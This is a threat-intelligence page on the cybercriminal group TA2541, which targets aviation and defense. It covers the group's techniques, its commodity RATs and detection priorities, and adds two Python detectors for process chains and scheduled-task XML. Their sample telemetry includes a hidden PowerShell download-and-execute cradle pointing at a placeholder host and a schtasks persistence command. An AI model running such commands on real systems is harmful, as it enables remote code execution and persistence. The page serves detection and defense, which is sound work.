G1018: TA2541
TA2541 is a cybercriminal group that has been targeting the aviation, aerospace, transportation, manufacturing, and defense industries since at least 2017. TA2541 campaigns are typically high volume and involve the use of commodity remote access tools obfuscated by crypters and themes related to aviation, transportation, and travel.[1][2]
Analyst context for executives and security teams
TA2541 matters because MITRE describes it as a cybercriminal group targeting aviation, aerospace, transportation, manufacturing, and defense since at least 2017, using high-volume campaigns, commodity remote access tools, crypters, and aviation/travel-themed lures. For leaders, the practical issue is not a novel zero-day profile; it is whether email, endpoint, logging, and response processes can handle repeated, obfuscated commodity RAT delivery attempts against operationally important sectors.
Executive priority
Prioritize validation where business operations depend on aviation, transportation, manufacturing, or defense workflows, or where staff are likely to receive travel- or logistics-themed messages. This object supports executive questions such as: can the organization prove it inspects high-volume email threats, detects commodity RAT execution and persistence, and preserves enough endpoint/network evidence for incident response? Because the relationship set includes obfuscation, user execution, PowerShell, WMI, scheduled tasks, process injection, and tool transfer, coverage should be treated as a layered resilience and audit-evidence issue rather than a single malware-signature problem.
Technical view
MITRE provides no official detection text for TA2541, so SOC and detection teams should validate coverage through the related software and techniques. The relationship set points to commodity RATs and spyware including NETWIRE, jRAT, Agent Tesla, Revenge RAT, njRAT, Imminent Monitor, WarzoneRAT, AsyncRAT, and the Snip3 crypter. Detection engineering should focus on the chain implied by the relationships: user interaction with malicious links or files, obfuscated or compressed payloads, execution through PowerShell/Visual Basic/WMI, persistence or execution via scheduled tasks, process injection or hollowing, basic host and internet connectivity discovery, and ingress transfer of additional tools.
Likely telemetry
- Email security and mail gateway logs for high-volume themed lures, links, attachments, and delivery outcomes
- Endpoint process creation, command-line, parent-child process, script, and module/load telemetry
- PowerShell, WMI, Visual Basic, and scheduled task creation or execution logs
- Endpoint detection telemetry for packed, encoded, compressed, or otherwise obfuscated files
- Memory/process behavior telemetry relevant to process injection and process hollowing
Detection direction
- Do not rely only on static signatures; the supplied relationships include crypter use, software packing, encrypted/encoded files, and compression.
- Tune detections around suspicious execution chains after a user opens a file or clicks a link, especially when followed by scripting, WMI, scheduled tasks, or unexpected external connections.
- Map coverage for each related commodity RAT family where feasible, but treat family naming as secondary to behaviors such as remote access tooling, persistence, discovery, and ingress tool transfer.
- Review false positives carefully for administrative tools such as PowerShell, WMI, and scheduled tasks; prioritize unusual parent processes, user context, timing, destinations, and file locations.
- Treat cross-platform visibility as a secondary check: the platform lists on related technique objects span Linux, macOS, Android, ESXi, IaaS, network devices, and containers, but every procedure attributed to TA2541 in the technique table on this page is Windows-specific (VBS, PowerShell, mshta, WMI, scheduled tasks, injection into .NET binaries), and the TA2541 group object itself declares no platforms.
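The chain the detection direction above describes (a user opens a lure, a script host or PowerShell runs, then a scheduled task is created or a .NET binary is injected) is easiest to reason about as ancestry over process-creation telemetry rather than as one signature per process. The following Python is an added example, not code from the page, MITRE, Proofpoint or Cisco. It assumes Sysmon Event ID 1 or EDR process-creation records flattened to JSON lines with the fields `ts`, `host`, `user`, `pid`, `ppid`, `image` and `cmdline`; the sample events, hosts, user names, paths and the `example.invalid` URL are constructed. The injection targets it watches (RegSvcs, MSBuild, InstallUtil) and the "script named like a Windows binary" check come from the procedures listed in the technique table further down the page; the scoring weights and the `ESCALATE_AT` threshold are assumptions to be tuned locally.

```python
"""Correlate process-creation telemetry into the execution chain the page
describes: lure document -> script host / PowerShell -> scheduled-task
persistence or injection into a .NET framework binary.

Added example, not from the page, MITRE, Proofpoint or Cisco. Events are
constructed to resemble Sysmon Event ID 1 / EDR records; all names are made up.
"""
import json
import ntpath
import re

# Constructed sample telemetry (JSON lines), not real incident data.
SAMPLE_EVENTS = r"""
{"ts": 1, "host": "ws01", "user": "CORP\\jdoe", "pid": 100, "ppid": 1, "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"}
{"ts": 2, "host": "ws01", "user": "CORP\\jdoe", "pid": 200, "ppid": 100, "image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "cmdline": "WINWORD.EXE /n Charter_Flight_Request.docm"}
{"ts": 3, "host": "ws01", "user": "CORP\\jdoe", "pid": 300, "ppid": 200, "image": "C:\\Windows\\System32\\wscript.exe", "cmdline": "wscript.exe C:\\Users\\jdoe\\AppData\\Roaming\\svchost.vbs"}
{"ts": 4, "host": "ws01", "user": "CORP\\jdoe", "pid": 400, "ppid": 300, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')\""}
{"ts": 5, "host": "ws01", "user": "CORP\\jdoe", "pid": 500, "ppid": 400, "image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", "cmdline": "RegSvcs.exe"}
{"ts": 6, "host": "ws01", "user": "CORP\\jdoe", "pid": 600, "ppid": 400, "image": "C:\\Windows\\System32\\schtasks.exe", "cmdline": "schtasks /create /sc minute /mo 5 /tn Updater /tr \"wscript.exe C:\\Users\\jdoe\\AppData\\Roaming\\svchost.vbs\" /f"}
{"ts": 7, "host": "ws02", "user": "CORP\\admin", "pid": 700, "ppid": 1, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -File C:\\Scripts\\Invoke-Patch.ps1"}
{"ts": 8, "host": "ws02", "user": "CORP\\admin", "pid": 800, "ppid": 700, "image": "C:\\Windows\\System32\\schtasks.exe", "cmdline": "schtasks /create /sc daily /tn Patch /tr C:\\Scripts\\patch.exe"}
"""

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# .NET framework binaries the page's technique table names as injection targets.
DOTNET_TARGETS = {"regsvcs.exe", "msbuild.exe", "installutil.exe"}
# Names a dropped script may borrow to look like system functionality (T1036.005).
WINDOWS_NAMES = {"svchost", "csrss", "lsass", "winlogon", "explorer", "services", "spoolsv"}
ESCALATE_AT = 70  # assumed tuning knob: below this an alert goes to review, not paging


def parse_events(text):
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def image_name(ev):
    return ntpath.basename(ev["image"]).lower()


def classify(ev):
    """Map one process to the chain stage it can play, or None."""
    name, cmd = image_name(ev), ev["cmdline"].lower()
    if name in OFFICE:
        return "office"
    if name in SCRIPT_HOSTS:
        return "script_host"
    if name in POWERSHELL:
        return "powershell"
    if name == "schtasks.exe" and "/create" in cmd:
        return "task_create"
    if name in DOTNET_TARGETS:
        return "dotnet_target"
    return None


def ancestry(ev, by_key):
    """Walk ppid links on the same host, root first; stops at unknown or cyclic pids."""
    chain, seen, cur = [ev], {ev["pid"]}, ev
    while (cur["host"], cur["ppid"]) in by_key and cur["ppid"] not in seen:
        cur = by_key[(cur["host"], cur["ppid"])]
        seen.add(cur["pid"])
        chain.append(cur)
    return chain[::-1]


def masqueraded_script(cmdline):
    """Return a script path under a user profile whose stem mimics a Windows binary."""
    for m in re.finditer(r"[A-Za-z]:\\[^\s\"']+\.(?:vbs|vbe|js|jse|hta)", cmdline, re.I):
        path = m.group(0)
        stem = ntpath.splitext(ntpath.basename(path))[0].lower()
        if stem in WINDOWS_NAMES and "\\users\\" in path.lower():
            return path
    return None


def find_chains(events):
    """Alert on task creation or .NET-target spawns that sit beneath a scripting host."""
    by_key = {(e["host"], e["pid"]): e for e in events}
    alerts = []
    for ev in events:
        stage = classify(ev)
        if stage not in ("task_create", "dotnet_target"):
            continue
        chain = ancestry(ev, by_key)
        stages = [classify(e) for e in chain[:-1]]
        if not any(s in ("script_host", "powershell") for s in stages):
            continue
        score, reasons = 50, [f"{stage} spawned beneath a scripting host"]
        if "office" in stages:
            score += 30
            reasons.append("chain begins at an Office process (T1204.002)")
        for e in chain:
            path = masqueraded_script(e["cmdline"])
            if path:
                score += 20
                reasons.append(f"user-profile script named like a Windows binary: {path} (T1036.005)")
                break
        alerts.append({"host": ev["host"], "user": ev["user"], "pid": ev["pid"], "score": score,
                       "chain": " -> ".join(image_name(e) for e in chain), "reasons": reasons})
    return alerts


def triage(events):
    """Split alerts into (escalate, review) by the assumed threshold."""
    alerts = find_chains(events)
    return ([a for a in alerts if a["score"] >= ESCALATE_AT],
            [a for a in alerts if a["score"] < ESCALATE_AT])


if __name__ == "__main__":
    escalate, review = triage(parse_events(SAMPLE_EVENTS))
    for label, group in (("ESCALATE", escalate), ("REVIEW", review)):
        for a in group:
            print(label, a["host"], a["user"], a["score"], a["chain"], "|", "; ".join(a["reasons"]))
```

On the constructed sample, the two ws01 leaves (RegSvcs.exe and the `schtasks /create` beneath WINWORD → wscript → powershell) score 100 and escalate, while the administrator's `powershell -File` → `schtasks /create` on ws02 scores 50 and lands in review: the same pair of administrative tools is present, but the parent chain, the absence of an Office ancestor and the absence of a user-profile script are what separate the two, which is the false-positive discipline the bullet above calls for.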
Mitigation priorities
- Strengthen email and web controls around malicious links, attachments, and high-volume social engineering themes relevant to aviation, transportation, and travel.
- Harden endpoint execution controls for script interpreters, WMI, scheduled tasks, and untrusted files, with special attention to Windows because many related software entries and techniques identify Windows support.
- Ensure endpoint protection and response tooling can inspect or at least surface packed, encoded, compressed, and crypter-obfuscated payload behavior.
- Restrict and monitor unnecessary outbound connectivity and file transfer paths so RAT command-and-control and ingress tool transfer are easier to detect and contain.
- Prepare incident response playbooks for commodity RAT intrusions, including host isolation, credential review where appropriate, persistence removal, and evidence preservation.
Analyst notes and limits
This take is based only on the supplied MITRE ATT&CK group object, its external references, and its relationship context. The most decision-relevant facts are the targeted industries, the high-volume campaign pattern, the aviation/transportation/travel lure themes, the commodity RAT usage, and the obfuscation through crypters. The relationships supply practical behavior anchors for detection and response; the group object itself carries no tactics, platforms, or official detection guidance.
Any platform or tactic statements above are therefore inherited from related software and technique objects, not declared for TA2541 directly. Local mail flow, endpoint operating systems, logging maturity, and observed incident evidence are required before assessing exposure or detection coverage.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1608.001 | Upload Malware | TA2541 has uploaded malware to various platforms including Google Drive, Pastetext, Sharetext, and GitHub.[1][2] |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder | TA2541 has placed VBS files in the Startup folder and used Registry run keys to establish persistence for malicious payloads.[1] |
| Enterprise | T1573.002 | Asymmetric Cryptography | TA2541 has used TLS encrypted C2 communications including for campaigns using AsyncRAT.[2] |
| Enterprise | T1105 | Ingress Tool Transfer | TA2541 has used malicious scripts and macros with the ability to download additional payloads.[2] |
| Enterprise | T1568 | Dynamic Resolution | TA2541 has used dynamic DNS services for C2 infrastructure.[1] |
| Enterprise | T1036.005 | Match Legitimate Resource Name or Location | TA2541 has used file names to mimic legitimate Windows files or system functionality.[1] |
| Enterprise | T1518.001 | Security Software Discovery | TA2541 has used tools to search victim systems for security products such as antivirus and firewall software.[1] |
| Enterprise | T1053.005 | Scheduled Task | TA2541 has used scheduled tasks to establish persistence for installed tools.[1] |
| Enterprise | T1027.002 | Software Packing | TA2541 has used a .NET packer to obfuscate malicious files.[2] |
| Enterprise | T1082 | System Information Discovery | TA2541 has collected system information prior to downloading malware on the targeted host.[1] |
| Enterprise | T1685 | Disable or Modify Tools | TA2541 has attempted to disable built-in security protections such as Windows AMSI.[1] |
| Enterprise | T1588.001 | Malware | TA2541 has used multiple strains of malware available for purchase on criminal forums or in open-source repositories.[1] |
| Enterprise | T1218.005 | Mshta | TA2541 has used `mshta` to execute scripts including VBS.[2] |
| Enterprise | T1588.002 | Tool | TA2541 has used commodity remote access tools.[2] |
| Enterprise | T1204.001 | Malicious Link | TA2541 has used malicious links to cloud and web services to gain execution on victim machines.[1] (Citation: FireEye NETWIRE March 2019) |
| Enterprise | T1583.001 | Domains | TA2541 has registered domains often containing the keywords “kimjoy,” “h0pe,” and “grace,” using domain registrars including Netdorm and No-IP DDNS, and hosting providers including xTom GmbH and Danilenko, Artyom.[1][2] |
| Enterprise | T1055 | Process Injection | TA2541 has injected malicious code into legitimate .NET related processes including regsvcs.exe, msbuild.exe, and installutil.exe.[1][2] |
| Enterprise | T1059.001 | PowerShell | TA2541 has used PowerShell to download files and to inject into various Windows processes.[1] |
| Enterprise | T1027.013 | Encrypted/Encoded File | TA2541 has used compressed and char-encoded scripts in operations.[2] |
| Enterprise | T1016.001 | Internet Connection Discovery | TA2541 has run scripts to check internet connectivity from compromised hosts.[2] |
| Enterprise | T1055.012 | Process Hollowing | TA2541 has used process hollowing to execute CyberGate malware.[2] |
| Enterprise | T1047 | Windows Management Instrumentation | TA2541 has used WMI to query targeted systems for security products.[1] |
| Enterprise | T1204.002 | Malicious File | TA2541 has used macro-enabled MS Word documents to lure victims into executing malicious payloads.[1][2] (Citation: Telefonica Snip3 December 2021) |
| Enterprise | T1059.005 | Visual Basic | TA2541 has used VBS files to execute or establish persistence for additional payloads, often using file names consistent with email themes or mimicking system functionality.[1][2] |
| Enterprise | T1566.002 | Spearphishing Link | TA2541 has used spearphishing e-mails with malicious links to deliver malware.[1] (Citation: Telefonica Snip3 December 2021) |
| Enterprise | T1027.015 | Compression | TA2541 has used compressed and char-encoded scripts in operations.[2] |
| Enterprise | T1566.001 | Spearphishing Attachment | TA2541 has sent phishing emails with malicious attachments for initial access including MS Word documents.[1][2] |
| Enterprise | T1583.006 | Web Services | TA2541 has hosted malicious files on various platforms including Google Drive, OneDrive, Discord, PasteText, ShareText, and GitHub.[1] |
Bracketed numbers refer to the external references listed at the end of this page; MITRE citations that are not in that list (FireEye NETWIRE March 2019, Telefonica Snip3 December 2021) are given by their ATT&CK citation key.
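The Scheduled Task (T1053.005), Visual Basic (T1059.005) and Match Legitimate Resource Name (T1036.005) rows above together describe one persistence shape: a task whose action is a script host pointing at a VBS file dropped under the user's profile with a system-sounding name. Task definitions are XML, carried in the TaskContent field of Security event 4698 and exported by `schtasks /query /xml`, so this can be checked directly from the artifact. The following Python is an added example, not code from the page, MITRE, Proofpoint or Cisco; the three task definitions, SIDs, paths and task names are constructed, and the point weights and verdict thresholds are assumptions to tune locally. One practical caveat it handles: the embedded XML carries an `encoding="UTF-16"` declaration, and once the event text is already a Python `str` that declaration makes expat refuse to parse it, so the declaration is stripped first.

```python
"""Inspect Task Scheduler XML for TA2541-style persistence: a script host,
mshta or PowerShell action pointing at a script under a user profile, often
hidden and on a short repeat interval.

Added example, not code from the page, MITRE, Proofpoint or Cisco. The task
definitions below are constructed in the Task Scheduler schema; SIDs, paths
and names are made up.
"""
import ntpath
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SCRIPT_COMMANDS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe"}
WINDOWS_NAMES = {"svchost", "csrss", "lsass", "winlogon", "explorer", "services", "spoolsv"}

# Constructed: the shape the page's T1053.005 / T1059.005 / T1036.005 rows describe.
MALICIOUS_TASK = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><Repetition><Interval>PT5M</Interval></Repetition>
    <StartBoundary>2022-02-01T09:00:00</StartBoundary><Enabled>true</Enabled></TimeTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-21-1111111111-2222222222-3333333333-1105</UserId>
    <LogonType>InteractiveToken</LogonType></Principal></Principals>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author"><Exec><Command>wscript.exe</Command>
    <Arguments>C:\Users\jdoe\AppData\Roaming\svchost.vbs</Arguments></Exec></Actions>
</Task>"""

# Constructed: a vendor updater running as SYSTEM once a day.
BENIGN_TASK = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2022-02-01T03:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\Program Files\Vendor\Updater.exe</Command>
    <Arguments>/silent</Arguments></Exec></Actions>
</Task>"""

# Constructed: an administrator's own PowerShell backup job; worth a look, not a page.
ADMIN_TASK = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2022-02-01T22:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-21-1111111111-2222222222-3333333333-500</UserId></Principal></Principals>
  <Actions Context="Author"><Exec><Command>powershell.exe</Command>
    <Arguments>-ExecutionPolicy Bypass -File C:\Users\admin\Documents\backup.ps1</Arguments></Exec></Actions>
</Task>"""


def strip_declaration(xml_text):
    # Event 4698 embeds the task with encoding="UTF-16"; as a str that makes expat
    # raise "multi-byte encodings are not supported", so drop the declaration.
    return re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text, count=1)


def parse_task(xml_text):
    root = ET.fromstring(strip_declaration(xml_text))

    def text(path):
        el = root.find(path, NS)
        return (el.text or "").strip() if el is not None else ""

    return {
        "command": text("t:Actions/t:Exec/t:Command"),
        "arguments": text("t:Actions/t:Exec/t:Arguments"),
        "interval": text(".//t:Repetition/t:Interval"),
        "user_id": text("t:Principals/t:Principal/t:UserId"),
        "hidden": text("t:Settings/t:Hidden").lower() == "true",
    }


def interval_seconds(duration):
    """ISO 8601 duration as used in <Interval> (e.g. PT5M) -> seconds, or None."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", duration or "")
    if not duration or not m:
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 86400 + h * 3600 + mi * 60 + s


def assess(xml_text):
    """Score one task definition; weights and thresholds are assumed, tune locally."""
    task = parse_task(xml_text)
    score, reasons = 0, []
    command = ntpath.basename(task["command"]).lower()
    target = f'{task["command"]} {task["arguments"]}'
    if command in SCRIPT_COMMANDS:
        score += 2
        reasons.append(f"action is a script host: {command}")
    m = re.search(r"[A-Za-z]:\\Users\\[^\s\"']+", target, re.I)
    if m:
        score += 2
        reasons.append(f"target under a user profile: {m.group(0)}")
        stem = ntpath.splitext(ntpath.basename(m.group(0)))[0].lower()
        if stem in WINDOWS_NAMES:
            score += 2
            reasons.append(f"target named like a Windows binary: {stem} (T1036.005)")
    secs = interval_seconds(task["interval"])
    if secs is not None and secs <= 15 * 60:
        score += 1
        reasons.append(f"repeats every {secs}s")
    if task["hidden"]:
        score += 1
        reasons.append("task is hidden")
    verdict = "escalate" if score >= 5 else "review" if score >= 3 else "ignore"
    return {"task": task, "score": score, "verdict": verdict, "reasons": reasons}


if __name__ == "__main__":
    for name, xml_text in (("malicious", MALICIOUS_TASK), ("benign", BENIGN_TASK), ("admin", ADMIN_TASK)):
        r = assess(xml_text)
        print(name, r["verdict"], r["score"], "; ".join(r["reasons"]))
```

The three constructed definitions land where an analyst would want them: the wscript task on `svchost.vbs` under `AppData\Roaming`, hidden and repeating every five minutes, escalates; the vendor updater is ignored; the administrator's PowerShell backup job is flagged for review because it shares two traits with the malicious task (a script host and a user-profile path) but none of the others, which is exactly the case the page's false-positive guidance says to judge by user context and timing rather than by the tool name alone.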
Groups, software, and campaigns
S1086: Snip3
Snip3 is a sophisticated crypter-as-a-service that has been used since at least 2021 to obfuscate and load numerous strains of malware including AsyncRAT, Revenge RAT, Agent Tesla, and NETWIRE.[1][2]
S0379: Revenge RAT
Revenge RAT is a freely available remote access tool written in .NET (C#).[1][2]
S0283: jRAT
S0670: WarzoneRAT
WarzoneRAT is a malware-as-a-service remote access tool (RAT) written in C++ that has been publicly available for purchase since at least late 2018.[1][2]
S0434: Imminent Monitor
Imminent Monitor was a commodity remote access tool (RAT) offered for sale from 2012 until 2019, when an operation was conducted to take down the Imminent Monitor infrastructure. Various cracked versions and variations of this RAT are still in circulation.[1]
S1087: AsyncRAT
S0198: NETWIRE
S0331: Agent Tesla
Agent Tesla is a spyware Trojan written for the .NET framework that has been observed since at least 2014.[1][2][3]
S0385: njRAT
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.1 | | Current bundle | 4e43a137d034… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] Proofpoint TA2541 February 2022: Larson, S. and Wise, J. (2022, February 15). Charting TA2541's Flight. Retrieved September 12, 2023.
- [2] Cisco Operation Layover September 2021: Ventura, V. (2021, September 16). Operation Layover: How we tracked an attack on the aviation industry to five years of compromise. Retrieved September 15, 2023.
- [3] mitre-attack G1018
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.